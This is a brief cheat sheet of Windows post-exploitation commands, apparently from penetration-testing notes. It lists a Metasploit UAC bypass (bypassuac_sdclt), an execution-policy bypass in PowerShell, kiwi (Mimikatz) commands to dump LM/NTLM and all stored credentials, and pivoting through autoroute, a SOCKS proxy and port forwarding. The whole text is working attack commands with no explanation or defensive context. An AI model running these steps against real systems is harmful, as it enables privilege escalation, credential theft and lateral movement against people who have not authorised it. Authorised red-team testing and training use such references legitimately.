6. Post-Exploitation Modules

powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel

use exploit/windows/local/bypassuac_sdclt
set session <id>
set LHOST <localhost>
run

#Load module:
load kiwi

#Dump LM/NTLM creds:
creds_msv

#Dump all creds:
creds_all

route add <ip-or-range> <msfsessionid>

route flush

use multi/manage/autoroute
set session <id>
run

SOCKS proxy module for tunnel outside of MSF:
- Edit proxychains conf to port 1080 and win!

use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set VERSION 5
run -j

portfwd add -l <localport> -p <remoteport> -r <remoteip>